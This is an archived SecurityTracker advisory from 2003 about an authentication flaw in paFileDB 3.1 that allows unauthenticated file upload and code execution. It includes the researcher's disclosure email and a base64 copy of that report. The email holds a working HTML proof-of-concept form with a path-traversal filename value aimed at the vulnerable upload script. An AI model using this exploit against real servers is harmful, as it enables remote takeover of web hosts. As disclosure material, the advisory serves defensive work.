SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   paFileDB Vendors:   PHP Arena
paFileDB Authentication Flaw Lets Remote Users Upload and Execute Arbitrary Code
SecurityTracker Alert ID:  1007295
SecurityTracker URL:  http://securitytracker.com/id/1007295
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 24 2003
Impact:   Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.1 and prior versions
Description:   A vulnerability was reported in paFileDB. A remote user can upload arbitrary files to the server and then use the web interface to execute the files.

It is reported that the "/includes/team/file.php" script does not check to determine if the remote user has a valid (authenticated) session. A remote user can submit a POST request to upload a file containing arbitrary PHP code. Then, the remote user can submit an HTTP request for the uploaded file and the PHP code in the file, including operating system commands, will be executed by the web server.

The vendor was reportedly notified on June 26, 2003.

Impact:   A remote user can upload arbitrary PHP code, including operating system commands, to the system and then execute the code with the privileges of the web server.
Solution:   The vendor has released a patch, available at:

http://forums.phparena.net/index.php?act=ST&f=26&t=2170

Vendor URL:  forums.phparena.net/index.php?act=ST&f=26&t=2170 (Links to External Site)
Cause:   Authentication error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  paFileDB 3.1


--Multipart_Thu__24_Jul_2003_08:52:33_+0200_081ecc50
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit


hola,

paFileDB 3.1 (http://www.phparena.net) allows arbitrary file-upload and os-command execution.

(security report attached)


nice day,
mEi


-- 
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE

mei@websec.org
http://www.websec.org
tel: 0043 699 121772 37




============================
Security REPORT paFileDB 3.1
============================

Product:	paFileDB Version 3.1 (and earlier)
Vulnerablities:	arbitrary file-upload, path-traversal, arbitrary OS command-execution
Vuln.-classes:	http://www.owasp.org/asac/parameter_manipulation/forms.shtml
		http://www.owasp.org/asac/input_validation/os.shtml
		http://www.owasp.org/asac/input_validation/pt.shtml
Vendor:		php arena (http://www.phparena.net/)
Vendor-Status:	contacted thru mailform (http://www.phparena.net/mail.php) 26.06.2003
Vendor-Patch:	http://forums.phparena.net/index.php?act=ST&f=26&t=2170

Exploitable:
Local:		NO
Remote:		YES

============
Introduction
============

(taken from website)
---*---
paFileDB is designed to allow webmasters have a database of files for download on their site. To add a download, all you do is upload the file using FTP or whatever method you use, log into paFileDB's admin center, and fill out a form to add a file.
---*---


=====================
Vulnerability Details
=====================


1) ARBITRARY FILE UPLOAD
========================

the script "/includes/team/file.php" (and maybe others) does not check for a valid session.
therefore it is possible to upload arbitrary files by creating/modifying a single form-parameter.

Form-example:
---*---
<html><body>
<form ENCTYPE="multipart/form-data" method="POST" action="http://srv/pafiledb/includes/team/file.php">
<input name="userfile" TYPE="file"><br>
<input name="userfile_name" TYPE="text" value="../../../uploads/makeawish"><br>
<input type="hidden" name="action" value="team">
<input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type=submit name=submit value="doit">
</form>
</body></html>
---*---

2) ARBITRARY OS-COMMAND EXECUTION
=================================

by uploading program- or script-files.



Severity:	HIGH 


=======
Remarks
=======

typical php-upload problem

====================
Recommended Hotfixes
====================

software patch.


EOF Martin Eiszner / @2003WebSec.org


=======
Contact
=======

WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna

Austria / EUROPE

mei@websec.org
http://www.websec.org



--Multipart_Thu__24_Jul_2003_08:52:33_+0200_081ecc50
Content-Type: application/octet-stream;
 name="pafiledb.txt"
Content-Disposition: attachment;
 filename="pafiledb.txt"
Content-Transfer-Encoding: base64

Cj09PT09PT09PT09PT09PT09PT09PT09PT09PT0KU2VjdXJpdHkgUkVQT1JUIHBhRmlsZURCIDMu
MQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09CgpQcm9kdWN0OglwYUZpbGVEQiBWZXJzaW9u
IDMuMSAoYW5kIGVhcmxpZXIpClZ1bG5lcmFibGl0aWVzOglhcmJpdHJhcnkgZmlsZS11cGxvYWQs
IHBhdGgtdHJhdmVyc2FsLCBhcmJpdHJhcnkgT1MgY29tbWFuZC1leGVjdXRpb24KVnVsbi4tY2xh
c3NlczoJaHR0cDovL3d3dy5vd2FzcC5vcmcvYXNhYy9wYXJhbWV0ZXJfbWFuaXB1bGF0aW9uL2Zv
cm1zLnNodG1sCgkJaHR0cDovL3d3dy5vd2FzcC5vcmcvYXNhYy9pbnB1dF92YWxpZGF0aW9uL29z
LnNodG1sCgkJaHR0cDovL3d3dy5vd2FzcC5vcmcvYXNhYy9pbnB1dF92YWxpZGF0aW9uL3B0LnNo
dG1sClZlbmRvcjoJCXBocCBhcmVuYSAoaHR0cDovL3d3dy5waHBhcmVuYS5uZXQvKQpWZW5kb3It
U3RhdHVzOgljb250YWN0ZWQgdGhydSBtYWlsZm9ybSAoaHR0cDovL3d3dy5waHBhcmVuYS5uZXQv
bWFpbC5waHApIDI2LjA2LjIwMDMKVmVuZG9yLVBhdGNoOglodHRwOi8vZm9ydW1zLnBocGFyZW5h
Lm5ldC9pbmRleC5waHA/YWN0PVNUJmY9MjYmdD0yMTcwCgpFeHBsb2l0YWJsZToKTG9jYWw6CQlO
TwpSZW1vdGU6CQlZRVMKCj09PT09PT09PT09PQpJbnRyb2R1Y3Rpb24KPT09PT09PT09PT09Cgoo
dGFrZW4gZnJvbSB3ZWJzaXRlKQotLS0qLS0tCnBhRmlsZURCIGlzIGRlc2lnbmVkIHRvIGFsbG93
IHdlYm1hc3RlcnMgaGF2ZSBhIGRhdGFiYXNlIG9mIGZpbGVzIGZvciBkb3dubG9hZCBvbiB0aGVp
ciBzaXRlLiBUbyBhZGQgYSBkb3dubG9hZCwgYWxsIHlvdSBkbyBpcyB1cGxvYWQgdGhlIGZpbGUg
dXNpbmcgRlRQIG9yIHdoYXRldmVyIG1ldGhvZCB5b3UgdXNlLCBsb2cgaW50byBwYUZpbGVEQidz
IGFkbWluIGNlbnRlciwgYW5kIGZpbGwgb3V0IGEgZm9ybSB0byBhZGQgYSBmaWxlLgotLS0qLS0t
CgoKPT09PT09PT09PT09PT09PT09PT09ClZ1bG5lcmFiaWxpdHkgRGV0YWlscwo9PT09PT09PT09
PT09PT09PT09PT0KCgoxKSBBUkJJVFJBUlkgRklMRSBVUExPQUQKPT09PT09PT09PT09PT09PT09
PT09PT09Cgp0aGUgc2NyaXB0ICIvaW5jbHVkZXMvdGVhbS9maWxlLnBocCIgKGFuZCBtYXliZSBv
dGhlcnMpIGRvZXMgbm90IGNoZWNrIGZvciBhIHZhbGlkIHNlc3Npb24uCnRoZXJlZm9yZSBpdCBp
cyBwb3NzaWJsZSB0byB1cGxvYWQgYXJiaXRyYXJ5IGZpbGVzIGJ5IGNyZWF0aW5nL21vZGlmeWlu
ZyBhIHNpbmdsZSBmb3JtLXBhcmFtZXRlci4KCkZvcm0tZXhhbXBsZToKLS0tKi0tLQo8aHRtbD48
Ym9keT4KPGZvcm0gRU5DVFlQRT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJQT1NUIiBh
Y3Rpb249Imh0dHA6Ly9zcnYvcGFmaWxlZGIvaW5jbHVkZXMvdGVhbS9maWxlLnBocCI+CjxpbnB1
dCBuYW1lPSJ1c2VyZmlsZSIgVFlQRT0iZmlsZSI+PGJyPgo8aW5wdXQgbmFtZT0idXNlcmZpbGVf
bmFtZSIgVFlQRT0idGV4dCIgdmFsdWU9Ii4uLy4uLy4uL3VwbG9hZHMvbWFrZWF3aXNoIj48YnI+
CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImFjdGlvbiIgdmFsdWU9InRlYW0iPgo8aW5wdXQg
dHlwZT0iaGlkZGVuIiBuYW1lPSJ0bSIgdmFsdWU9ImZpbGUiPgo8aW5wdXQgdHlwZT0iaGlkZGVu
IiBuYW1lPSJmaWxlIiB2YWx1ZT0idXBsb2FkIj4KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0i
dXBsb2FkIiB2YWx1ZT0iZG8iPgo8aW5wdXQgdHlwZT1zdWJtaXQgbmFtZT1zdWJtaXQgdmFsdWU9
ImRvaXQiPgo8L2Zvcm0+CjwvYm9keT48L2h0bWw+Ci0tLSotLS0KCjIpIEFSQklUUkFSWSBPUy1D
T01NQU5EIEVYRUNVVElPTgo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KCmJ5IHVw
bG9hZGluZyBwcm9ncmFtLSBvciBzY3JpcHQtZmlsZXMuCgoKClNldmVyaXR5OglISUdIIAoKCj09
PT09PT0KUmVtYXJrcwo9PT09PT09Cgp0eXBpY2FsIHBocC11cGxvYWQgcHJvYmxlbQoKPT09PT09
PT09PT09PT09PT09PT0KUmVjb21tZW5kZWQgSG90Zml4ZXMKPT09PT09PT09PT09PT09PT09PT0K
CnNvZnR3YXJlIHBhdGNoLgoKCkVPRiBNYXJ0aW4gRWlzem5lciAvIEAyMDAzV2ViU2VjLm9yZwoK
Cj09PT09PT0KQ29udGFjdAo9PT09PT09CgpXZWJTZWMub3JnIC8gTWFydGluIEVpc3puZXIKR3Vy
a2dhc3NlIDQ5L1RvcDE0CjExNDAgVmllbm5hCgpBdXN0cmlhIC8gRVVST1BFCgptZWlAd2Vic2Vj
Lm9yZwpodHRwOi8vd3d3LndlYnNlYy5vcmcK

--Multipart_Thu__24_Jul_2003_08:52:33_+0200_081ecc50--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC